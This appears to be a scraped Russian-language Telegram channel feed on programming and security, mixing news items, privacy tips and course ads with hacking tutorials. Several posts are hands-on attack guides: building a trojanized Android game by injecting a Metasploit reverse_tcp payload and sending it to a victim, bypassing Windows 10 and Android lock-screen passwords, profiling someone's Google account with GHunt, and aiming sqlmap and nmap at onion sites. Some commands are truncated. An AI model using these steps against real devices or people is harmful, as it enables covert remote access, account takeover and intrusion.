CODE RED
9.6K subscribers
9 photos
2 videos
1.1K links
Мир глазами программистов; лучшая литература, обучающие статьи, курсы и некоторые полезные лайфхаки.

Обратная связь: @encryptedadm
加入频道
​​Замена местоположения на смартфоне

На канале CODE RED уже упоминалась возможность подменять местоположение на Android в посте про создание фейковых пробок. Однако давайте разберем эту тему поподробнее. Всем известно, что некоторые приложения отслеживают координаты устройства и это не очень безопасно.

Повысить анонимность можно подменив местоположение, и сделать это возможно с помощью Hola Fake GPS location. Оно находится в PlayMarket.

Настройка и использование

Для начала работы необходимо включить режим разработчика на смартфоне. Сделать это можно перейдя в настройки, далее "О телефоне", в некоторых моделях поле "Номер сборки" находится именно здесь, но чаще всего нужно перейти ещё во вкладку "Сведения о ПО". Собственно найдя пункт "Номер сборки" по нему необходимо кликнуть 7 раз.

Теперь, когда режим разработчика включен можно открыть приложение Hola. При первом запуске нужно будет нажать на появившуюся кнопку "GO". Откроется всплывающее окно, где нужно кликнуть по "Settings". Откроются все те же настройки, где нужно найти пункт "Выбрать приложение для фиктивных местоположений", нажать на него и непосредственно выбрать Hola Fake GPS.

Остается включить определение местоположения только по GPS спутникам. На каждом устройстве это делается по разному, но в пределах вкладки "Местоположение" или "Локация", в общих настройках.

Готово. Теперь можно возвращаться в приложение, вписывать в поиск любое местоположение и начинать подмену нажав кнопку "GO".
​​Microsoft призвала отказаться от многофакторной аутентификации по телефону

Директор подразделения по безопасности идентификационных данных Microsoft Алекс Вайнерт призвал пользователей отказаться от методов многофакторной аутентификации по телефону, таких как одноразовые SMS-коды и голосовые звонки. Вместо этого он советует прибегнуть к приложениям для аутентификации и ключам безопасности.

В прошлом году Вайнерт цитировал статистику компании, по которой многофакторная аутентификация (MFA) позволяет предотвратить 99,9% автоатак на пользовательские аккаунты Microsoft. Но в одном из свежих постов он пишет, что по возможности юзерам следует остановить свой выбор на MFA-технологиях, которые не задействуют сотовые сети.

Это связано проблемами в их безопасности: телефонные сообщения и звонки могут быть легко перехвачены посредством программно определяемых радиосистем, фемтосот или инструментов для взлома протокола SS7 (ОКС-7), используемого для маршрутизации звонков и передачи SMS. Одноразовые коды можно украсть с помощью опенсорсных сервисов Modlishka, CredSniper и Evilginx.

Кроме того, злоумышленники могут завладеть кодами при помощи SIM-свопинга, обманом заставив сотрудников мобильного оператора перевыпустить SIM-карту жертвы от её имени. После активации новой SIM-карты с номером жертвы на собственном телефоне хакер получает доступ к любому сервису, к которому привязана проверка по номеру телефона.

Вайнерт называет звонки и сообщения самым небезопасным способом многофакторной аутентификации. По его мнению, в дальнейшем их надёжность будет только снижаться. Неплохой альтернативой будет приложение Microsoft Authenticator, но лучше всего пользоваться физическими ключами безопасности, говорит Вайнерт.

#новость
​​Как создать вирус удаленного доступа на Android 10

Попутно тому, как смартфоны становятся частью человеческой жизни, возникает все больше новых зловредных программ ориентированных под мобильные операционные системы. И если раньше можно было не переживать, качая софт только с официального магазина, то теперь злоумышленники научились обходить и профессиональные системы идентификации вирусов.

Разновидностей зловредов стало также больше. Под Андроид появились свои шифровальщики, стиллеры и бекдоры. О последних сегодня и пойдет речь. В качестве демонстрации будет представлен процесс создания вируса удаленного доступа, только не с помощью вспомогательных программ, а своими руками. Заражать будем тестовый apk файл с игрой.

Установка необходимых компонентов

Устанавливаем Kali Linux.

Далее установим Zipalign

 apt-get install -y zipalign

Ещё нам понадобятся программы keytool и jarsigner, которые находятся в Java SDK. Утилиту Apktool можно скачать запустив этот файл. Также понадобятся предустановленные ngrok и Metasploit.

Сборка бекдора

Запускаем в отдельном окне ngrok

 tcp 4444

Полученные lhost и lport используем для создания пейлоада

 -p android/meterpreter/reverse_tcp LHOST=<адресс lhost> LPORT=<значение lport>M> /home/kali/payload.apk

На выходе получаем apk файл. Его и файл игры, в которую будем вшивать вирус, нужно распаковать с помощью комманд

 d game.apk 
◽️apktool d payload.apk

Теперь остается преобразить загрузочный файл бекдора. Копируем папку metasploit по пути /payload/smali/com/ в /game/smali/com/. Теперь переходим в папку /game/smali/com/dotgears/game/ и открываем файл SplashScreen.smali. В нем находим метку "virtual methods" и после строки начинающейся на invoke-super, то есть на строку под номером 34, вставляем

 {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

Теперь нужно обновить запрос разрешений при установке. Для этого переходим в папку payload и из файла AndroidManifest.xml копируем все теги uses-permission. Вставляем их в аналогичный файл AndroidManifest.xml в папке game, удалив при этом находящиеся там теги uses-permission.

Компилируем отредактированный файл игры в apk

 b game

Готовый файл нужно искать в game/dist/. Остается его подписать. Генерируем подпись коммандой

 -genkey -V -keystore key.keystore -alias codered -keyalg RSA -keysize 2048 -validity 1000

Получаем файл key.keystore. Теперь сертифицируем наш apk

 -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore game.apk codered

Выравниваем подписанное приложение командой

 -v 4 game.apk game_good.apk

Готово! Теперь можно захватывать сессию на целевом смартфоне отослав туда данный apk файл. Атакуемое устройство, в нашем случае, должно находиться в локальной сети с атакующим, поскольку мы изначально в целях демонстрации выбрали такие параметры в ngrok.
​​Как сбросить пароль на Windows 10

При покупке б/у устройства или при неправильной установке операционной системы довольно часто появляется необходимость сбросить пароль доступа. В новых версиях реализована удобная система восстановления пароля с помощью вопросов. Ответы на них задает сам пользователь на этапе установки Windows.

Однако что если это не применимо для конкретной ситуации? Пароль Windows можно легко обойти без посторонних программ. Понадобится только загрузочная флешка с данной операционной системой.

Процесс сброса пароля

Загрузитесь с флешки и в открывшимся окне установки нажмите Shift+F10(Shift+Fn+F10 на некоторых ноутбуках).

Откроется командная строка, в которой надо ввести regedit и нажать Enter.

Далее откроется редактор реестра. В нем выбираем HKEYLOCALMACHINE, кликаем на "Файл" потом на "Загрузить куст". Задайте любое имя и нажмите "Ок".

Создастся раздел реестра под заданным именем в HKEYLOCALMACHINE. В нем нужно найти подраздел "Setup" и открыть его.

На правой панели нужно кликнуть два раза по параметру CmdLine. В открывшемся окне задать cmd.exe и нажать "ОК". Также нужно поменять значение параметра SetupType на 2.

Далее нужно выбрать раздел с заданным вами ранее именем, кликнуть на "Файл", затем "Выгрузить куст" и подтвердить выгрузку.

Почти готово, теперь можно закрывать все окна и перезагружаться с жесткого диска. При запуске системы откроется командная строка.

В ней нужно вписать команду

 user

Просмотрев список пользователей, выбираем нужного и прописываем команду

 user <имя выбранного пользователя> <новый пароль>

Если имя содержит пробелы, его нужно взять в кавычки.

Далее нужно откатить правки в реестре. Вписываем в консоль regedit и переходим к разделу HKEYLOCALMACHINE\System\Setup. Из параметра CmdLine удаляем значение, а в SetupType прописываем 0.

Готово! Теперь можно закрывать редактор и командную строку, перезагружать устройство и авторизовываться с помощью нового пароля.
​​Бывший хакер возглавил службу безопасности Twitter

Руководителем службы безопасности Twitter назначен специалист по сетевой безопасности и один из самых известных в мире хакеров Пейтер Затко.

На посту главы службы безопасности Twitter Затко будет заниматься информационной безопасностью, безопасностью сайта, физической безопасностью и безопасностью платформы. Он получит широкие полномочия, включая возможность предлагать изменения в структуре и методах работы соцсети и будет подчиняться непосредственно генеральному директору компании Джеку Дорси.

Затко, во время хакерской деятельности носивший псевдоним Мадж, стал известен благодаря своим достижениям в хакерском объединении L0pht. Кроме того, он является одним из ключевых членов хакерской и медиагруппировки «Культ мертвой коровы», которая была создана в 80-е годы прошлого века. Также он занимался исследованиями в области кибербезопасности для федерального агентства DARPA, находящегося в подчинении Пентагона, и специальными проектами для корпорации Google, а в последнее время работал с платежным сервисом Stripe.

#новость
​​Информационная безопасность — это не про таинственный образ хакера из популярных сериалов и кино.

Это про чёткое понимание того, как функционируют системы, как они разрабатываются и как защищать данные в этих системах и сами системы.

Об индустрии кибербезопасности подробно расскажут на бесплатном занятии Нетологии «Как стать специалистом по информационной безопасности с нуля».

В результате вы узнаете:
— О востребованности сферы, кому она подходит и как в неё попасть;
— Как информационная безопасность работает в теории и на практике и какие основные технологии и инструменты в ней используют;
— Какие нужны знания и навыки, чтобы стать специалистом в области кибербезопасности и как их получить.

Спикер:
— Анастасия Баринова, заместитель руководителя лаборатории компьютерной криминалистики по обучению в Group-IB.

Регистрация по ссылке ↓
http://netolo.gy/fXV
​​Как взламывают каналы в Telegram

Во вторник, 10 ноября, крупный телеграм канал Reddit с аудиторией в 235 тысяч человек был взломан. К счастью, не с помощью уязвимостей самого сервиса, а с использованием социальной инженерии. Злоумышленники написали главному администратору канала от лица представителей Filmora и вынудили установить вирус удаленного доступа под видом видеоредактора.

Как итог администрация канала потеряла к нему доступ на некоторое время. Хакеры удалили действующих админов, наделив себя всеми правами создателей. К слову, в этот же день аналогичным образом был атакован канал Baza, но получить к нему доступ не удалось.

Эта новость лишь одна из, поскольку в последнее время тема с "захватом" телеграм каналов становится особо актуальной. Злоумышленники используют сразу несколько способов взлома. Все они базируются на социальной инженерии и невнимательности пользователей. Разберем для примера несколько из них.

Фейковый гарант

Этот способ уже получил достаточную огласку, однако на него продолжают вестись неопытные пользователи. Суть заключается в создании копии аккаунта зарекомендовавшего себя гаранта, чтобы простым просмотром профиля было сложно отличить оригинал от подделки.

Делается это с помощью замены схожих символов или незаметных корректив в никнейме, копирования аватарки и поля "О себе". Также есть вариант со скрытием юзернейма, и подстановку оригинального ника в поле "О себе".

Процесс работы схемы очевиден. Покупатель создает чат с фейковым гарантом и продавцом. Продавец из-за схожести профилей не может отличить лже-гаранта. Начинается процесс сделки, владелец передает права злоумышленнику и не получает обещанных денег.

Через видео-конференцию

Данный способ более изощренный, но не менее действенный. Выманив у владельца номер телефона, злоумышленник просит продемонстрировать наличие прав администратора у продавца через конференцию в Skype или Zoom.

В момент, когда действующий администратор демонстрирует свой аккаунт Telegram, злоумышленник пытается залогиниться с помощью номера телефона. Тем самым код подтверждения приходит сообщением владельцу канала, хакер его видит с помощью трансляции, вписывает и получает доступ. После чего банальный процесс передачи прав на другой аккаунт, и канал захвачен.

Как защитить канал

В итоге, выводом из представленных выше способов взлома телеграм-каналов могут быть следующие советы. При продаже канала лучше лично найти проверенного гаранта, либо максимально тщательно проверять профили предоставляемых. Закрывать конфиденциальную информацию при видеоконференции или пользоваться скриншотами. Не скачивать посторонних программ, и просто придерживаться базовых правил информационной безопасности.

#взлом #мошенничество
​​Названы самые популярные пароли в 2020 году

Аналитики компании по управлению паролями NordPass представили рейтинг из 200 самых популярных паролей в сети в 2020 году.

Проверив почти 275,7 миллиона паролей, NordPass опубликовал список наиболее часто используемых паролей для онлайн-аккаунтов в 2020 году. Первые пять строчек заняли такие сочетания, как "123456789", "picture1", "password" и "12345678". Самым популярным паролем оказался "123456", который только за 2020 год был взломан более 23 миллионов раз.

Более короткий пароль «12345» занимал первое место в прошлом году. Но более 188000 пользователей выбрали его в этом году, что позволило занять ему восьмое место. Оба пароля можно взломать менее чем за секунду.

Аналитики заметили, что пользователи предпочитают простые пароли, ведь их проще запомнить. Ради удобства многие используют для защиты аккаунтов нецензурные слова, числа, имена и еду.

#новость
​​Google тестирует сквозное шифрование для сообщений в Android

Google планирует реализовать сквозное шифрование для стандарта Rich Communication Service (RCS), предназначенного для получения и отправки текстовых сообщений. Именно этот стандарт интернет-гигант продвигает как альтернативу СМС-сообщениям.

Само собой, RCS серьёзно превосходит SMS во многих аспектах. Например, стандарт Google предлагает более длинные сообщения, поддерживающие расшаривание геолокации и более функциональную оправку медиафайлов.

На этой неделе Google сообщил об успешном внедрении RCS по всему миру, а теперь пришло время для следующего шага — сквозного шифрования (E2EE).

Пользователям должен понравиться дополнительный упор на конфиденциальность, ведь интерес к сквозному шифрованию возник ещё после слов Эдварда Сноудена, обвинившего АНБ США в шпионаже за гражданами.

Принято считать, что E2EE защищает переписки пользователей от вторжения третьей стороны. Сквозное шифрование успешно реализовали такие узнаваемые мессенджеры, как Signal, WhatsApp и iMessage.

Технические детали, описывающие нововведение, Google опубликовал здесь (PDF). Из этого документа можно понять, что защищённые E2EE сообщения будут генерироваться с помощью протокола Signal.

#новость
​​Сбор информации об учетной записи Google

Снова, независимые разработчики создали еще один полезный OSINT инструмент, который позволяет извлечь большое количество информации из электронной почты чьей-либо учетной записи Google.

На данный момент, инструмент поможет собирать такую информацию, как: Имя владельца аккаунта, время последнего редактирования профиля, Google ID, активированные сервисы Google, Возможный канал на YouTube, возможные другие имена пользователя, публичные фото, распознает модель и прошивку смартфона, установленные программы, cобытия из Календаря Google и самое интересное, возможное физическое местонахождение.

Для работы требуется Python 3.7+.

Установка

python -m pip install -r requirements.txt

Настройка

check_and_gen.py

python hunt.py почтаюзера@gmail.com

Этот проект использует Selenium и автоматически загружает правильный драйвер для вашей версии Chrome. Так что просто убедитесь, что у вас установлен Google Chrome.

📌https://github.com/mxrch/GHunt

#OSINT
​​Android-мессенджер со 100 млн загрузок раскрывает пересылаемые медиафайлы

Исследователи компании Trustwave обнаружили уязвимость в приложении GO SMS Pro, установленном более 100 000 000 раз. Из-за бага мультимедийные файлы (голосовые сообщения, видео и изображения), которыми обмениваются пользователи, оказались доступны любому желающему.

Медиафайлы, отправляемые получателям, у которых на смартфоне не установлен мессенджер GO SMS Pro, доступны на серверах приложения по укороченной ссылке, переадресовывающей получателя на сервер в сети доставки контента (CDN), где хранятся файлы пользователей. Укороченные ссылки генерируются последовательно (с помощью шестнадцатеричного счетчика) при каждой отправке файла, благодаря чему любой желающий может просматривать чужие файлы даже без ссылки на них.

Как пояснили эксперты, злоумышленникам не составит труда написать простой скрипт для быстрого составления списка адресов, связанных с фотографиями и видеозаписями, отправляемыми через приложение GO SMS Pro.

«Вставив сгенерированные URL в расширения для работы с множеством вкладок в Chrome или Firefox, можно легко получить доступ к личным (и потенциально чувствительным) медиафайлам, отправленным пользователями приложения», - пояснили исследователи.

#новость
​​Tails - полностью анонимная операционная система

Использование Tor браузера в связке с Windows конечно повышает анонимность пользователя, однако такие факторы как подключения фоновых программ, оригинальный MAC адрес и банальные вирусы могут свести эту анонимность к нулю.

Чтобы максимально обезопасить себя при работе с ПК, особенно если эта работа связана с обработкой секретной информации, как, к примеру, в журналистике, нужно использовать специальную ОС. В ней должны шифроваться все соединения и блокироваться малейшие попытки деанонимизации. Также она, в идеале, не должна оставлять следов работы на устройстве. Под всё это описание подходит операционная система Tails.

Она финансируется непосредственно проектом Tor. Tails также использовал Эдвард Сноуден для разоблачения программы разведки PRISM. Загружается Tails исключительно с флешки или диска и обладает эффектом "амнезии", то есть при каждом перезапуске полностью стирает всю накопленную ранее информацию, однако это можно настроить. Раньше для записи образа Tails на флешку необходимо было иметь два носителя. Сейчас это можно сделать в несколько кликов имея только одну флешку.

Обновленный процесс установки

Чтобы создать загрузочную флешку Tails нужно для начала скачать образ диска.

Далее скачиваем программу для записи образов Etcher.

Открываем её, выбираем файл образа, выбираем диск, жмем "Flash".

Готово, после загрузки можно вынимать флешку и пользоваться Tails.

Запуск операционной системы

Для запуска Tails нужно загрузиться через флешку выставив ей главный приоритет в boot меню BIOS.

Далее откроется окно с настройками, где можно будет опционально установить пароль администратора, чтобы иметь возможность загружать программы, и доступ к небезопасному браузеру, если появится необходимость в поиске без анонимизации.

После запуска можно будет также настроить раздел Persistence для сохранения файлов и программ.
​​Пользователи Spotify подверглись атакам подбора паролей

Пользователи популярного стримингового сервиса Spotify стали жертвами киберпреступников, запустивших атаки вида «credential stuffing», позволившие получить контроль над некоторыми аккаунтами. Ещё одно яркое напоминание о том, что нельзя использовать одинаковые пароли для разных онлайн-сервисов.

Как вы уже поняли, атаки «credential stuffing» рассчитаны на людей, которые не хотят запоминать множество паролей или пользоваться соответствующими менеджерами. Как правило, это приводит к тому, что на нескольких сайтах вводятся одни и те же пароли. В этом случае киберпреступники, используя утечку у одной из компаний, могут «угнать» и другие учётные записи пользователя. Для этого задействуются специальные скрипты, автоматизирующие этот процесс.

Недавно специалисты vpnMentor обнаружили открытую базу данных Elasticsearch, содержащую более 380 млн записей, в том числе учетных и других конфиденциальных данных, с помощью которых злоумышленники пытаются получить доступ к учетным записям пользователей Spotify. Размер БД составляет 72 ГБ. В ней содержатся имена пользователей и пароли, работающие для Spotify, электронные адреса и страны проживания.

БД принадлежит третьей стороне и используется для хранения учетных данных пользователей Spotify, вероятно, полученных незаконным путем или утекших с других ресурсов. Ее происхождение и метод атаки пока неизвестны.

Исследователи связались с администрацией сервиса, и Spotify начал процедуру сброса паролей. Атака затронула порядка 300-350 тыс. пользователей – сравнительно небольшая часть от 299-миллионной ежемесячной аудитории сервиса.

Пользователям, использующим пароль для авторизации в Spotify на других сервисах, настоятельно рекомендуется сменить его и там.

#новость
​​Подавление микрофона на Android устройствах

Ранее, мы уже рассматривали приложение, которое блокирует доступ к микрофону программным методом. Но, появилась весьма достойная альтернатива подобному роду инструментов, которая задействует технические ресурсы микрофона для его полного зашумления.

Подобное, позволяет осуществить приложение, которое носит название «PilferShush Jammer». Оно помимо того, что способно удерживать доступ к микрофону и блокировать программы от получения основного фокуса, в дополнении, может излучать высокочастотные звуковые сигналы, иными словами, белый шум, который попросту заглушает запись микрофона. Тем самым, ничего кроме помех, прослушать будет невозможно.

Несмотря на то, что приложение беспрерывно работает с пассивным подавлением микрофона, оно имеет крайне низкое энергопотребление. Во время звонков, оно так же отключает всевозможные блокировки. Понять, что приложение начало свою работу, можно по характерным значкам микрофона в шторке уведомлений.

📌https://f-droid.org/packages/cityfreqs.com.pilfershushjammer/

#приватность #android
​​Как обойти пароль на Android смартфоне

История с забытым паролем от старого смартфона не нова. Очевидным способом является сброс до заводских настроек, однако что если на устройстве присутствует важная информация, которую не хотелось бы потерять?

Тогда на помощь может прийти метод работающий не на всех, но на львиной доле Android смартфонов. Заключается он в установке Aroma File Manager прямо в Recovery Mode. Единственное, что для этого понадобится - SD карта и картридер.

Установка Aroma File Manager в Recovery Mode

Скачиваем архив.

Не распаковывая заливаем его на SD карту.

Далее непосредственно входим в Recovery Mode. На разных устройствах комбинации для этого рахные: клавиша громкости + кнопка выключения или громкость "вниз" + кнопка "Домой" + клавиша выключения и ещё несколько менее популярных вариантов.

Далее в меню Recovery Mode выбираем Install Zip from SD Card и указываем путь к архиву с Aroma File Manager.

Обход пароля

После установки программа Aroma запустится прямо в Recovery Mode.

Переходим в настройки и выбираем пункт "Automount all devices on start".

Далее необходимо перезагрузиться снова в Recovery и вновь установить Aroma File Manager, как несколькими шагами ранее.

Почти готово, теперь с помощью программы нужно перейти по пути "Data Folder" - "System Folder" и удалить файл "gesture.key" или "password.key".

Всё, теперь можно перезагрузить смартфон и войти в систему без пароля.

#хакинг #android
​​Данные 16 млн больных COVID-19 бразильцев утекли в Сеть

В открытый доступ попали персональные данные свыше 16 миллионов жителей, заболевших коронавирусной инфекцией COVID-19. Среди пострадавших от утечки оказались президент страны Жаир Болсонару, 7 министров и 17 губернаторов штатов.

Раскрытие данных произошло не в результате хакерской атаки, а по вине сотрудника больницы им. Альберта Эйнштейна, который выложил на GitHub электронную таблицу с именами пользователей, паролями и ключами доступа к системам Министерства здравоохранения Бразилии.

В результате была скомпрометирована личная информация пациентов, проходивших лечение в медучреждениях Бразилии. В частности, базы данных содержали имена, адреса, историю болезни и режимы приема лекарств.

Среди систем, затронутых утечкой, были E-SUS-VE и Sivep-Gripe, а также две правительственные базы данных, в которых хранились данные о гражданах, проверявшихся на COVID-19. E-SUS-VE использовалась для регистрации пациентов с легкими симптомами, а Sivep-Gripe — для отслеживания случаев госпитализации.

По словам виновника утечки, он загрузил электронную таблицу в целях тестирования, но забыл её удалить. После инцидента чиновники поменяли пароли и ключи доступа к системам Минздрава.

#новость
​​Как узнать, кто использует компьютер, когда вас нет рядом

Инструмент «Watcher», поможет решить данную задачу. Его работа заключается в том, что после запуска, курсор переводиться в нулевые координаты, а затем, если его сдвинуть, веб-камера компьютера сделает 3 фотографии и отправит их в Telegram канал. Спустя 5 секунд, мышь снова примет нулевые координаты. Это сделано на случай, если кто-то случайно заденет мышь компьютера.

Установка и настройка

1. Для работы, вам нужно создать бота в Telegram, а затем, вписать его токен на 9 строчку кода.
2. Далее, на 10 строке, ввести id канала, куда будут отправлены фотографии. Бота нужно добавить в качестве администратора.
3. После проделанных действий, нужно собрать .exe файл, выполнив команду в cmd:

pyinstaller -F --onefile --nocosole main.py

Чтобы перевести программу в режим ожидания, в котором она будет не активна, требуется зажать комбинацию клавиш «Alt + A». А если нужно вернуть активный режим, стоит нажать сочетание клавиш «Ctrl + Alt».

📌https://github.com/pro100git/watcher

#безопасность
​​На хакерском форуме опубликованы учетные данные для 50 тыс. VPN-устройств Fortinet

На прошлых выходных на одном из хакерских форумов были опубликованы эксплоиты для уязвимости в VPN-устройствах Fortinet ( CVE-2018-13379 ) и IP-адреса порядка 50 тыс. уязвимых устройств, принадлежащих крупным банкам, телекоммуникационным компаниям и правительственным организациям по всему миру. В то время опубликовавший их киберпреступник заявлял, что в его распоряжении также имеются учетные данные для этих уязвимых устройств, и теперь он выложил их в открытый доступ.

Успешная эксплуатация уязвимости в FortiOS позволяет получить доступ к чувствительному файлу sslvpnwebsession на VPN-устройстве Fortinet. В файле содержится связанная с сеансом информация и, что важнее, незашифрованные имена пользователей и пароли.

Аналитик безопасности под псевдонимом BankSecurity обнаружил на хакерском форуме еще одну ветку обсуждения, где киберпреступник опубликовал дамп данных, содержащий файлы sslvpnwebsession для каждого опубликованного ранее IP-адреса. Файлы раскрывают имена, пароли, уровни доступа и оригинальные IP-адреса пользователей, подключающихся к VPN. Данные опубликованы на форуме в виде RAR-архива размером 36 МБ, но после разархивирования объем файлов превышает 7 ГБ.

Зачем киберпреступнику понадобилось после IP-адресов публиковать еще и учетные данные, непонятно. Что интересно, в архиве содержится отдельный список IP-адресов и соответствующих файлов sslvpnwebsession уязвимых VPN-устройств, находящихся в Пакистане. Архив уже был скопирован и опубликован на ряде других форумов.

#новость
​​Адаптируем инструменты под атаки на onion-сайты

Несмотря на свою скрытность и шифрование, сайты в сети Tor работают практически также как и в clearnet. Соответственно на них также могут присутствовать различные уязвимости, с помощью которых можно нарушить работу ресурса или деанонимизировать его создателя, к примеру. А если некоторые процессы проведения атак универсальны для обоих типов сайтов, то и некоторые популярные инструменты можно также адаптировать для работы в даркнете. Рассмотрим, для примера, как настроить sqlmap и nmap для работы в сети Tor.

Установка всего необходимого

Устанавливаем Kali Linux.

Устанавливаем Tor командой

 instal tor

Программы sqlmap и nmap уже предустановлены в Kali Linux, однако если вы используете другой дистрибутив, их можно скачать с помощью следующих команд

 clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
apt-get install nmap

Делаем sqlmap анонимной

Для начала запускаем Tor просто прописав в терминале


Теперь мы можем выполнять типичные команды просто дописывая в конец --tor --tor-type=SOCKS5. Как например

 -u http://test.onion/index.php?id=2 --tor --tor-type=SOCKS5

Анонимизируем сканирование nmap

Для анонимизации сканирования через nmap можно использовать дополнительную утилиту ProxyChains. Скачаем её прописав

 install proxychains

По умолчанию proxychains уже настроен на работу с Tor, поэтому для начала стандартного сканирования можно ввести команду

 nmap -sT -PN -n -sV -p 21 test2vy6foxjlzsh.onion

Однако здесь стоит учесть, что сканироваться будет на корневой сервер, а нода Tor.

#хакинг #kali
Увлекаешься программированием, любишь нестандартные задачи или хочешь на законных основаниях «взламывать» сайты, еще и получая за это немаленькую зарплату? Тогда тебе явно нужно стать специалистом по кибербезопасности! Для этого просто нужно записаться на курс. Особенно, если он со скидкой до 60% 🎁
👉 Подробности по ссылке: https://clc.to/IrGMnA

Тебя ждет:
📍 множество полезных видеоуроков;
📍 увлекательное домашнее задание;
📍 личный наставник, который будет давать рекомендации на протяжении всего курса;
📍 вишенка на торте — дипломный проект.

После прохождения курса твое резюме пополнится такими навыками, как:
проведение тестов на проникновение;
анализ защищенности веб-приложений, сетевой инфраструктуры и разработка рекомендаций;
проведение аудита безопасности;
подготовка документации и отчетов по результатам тестирований.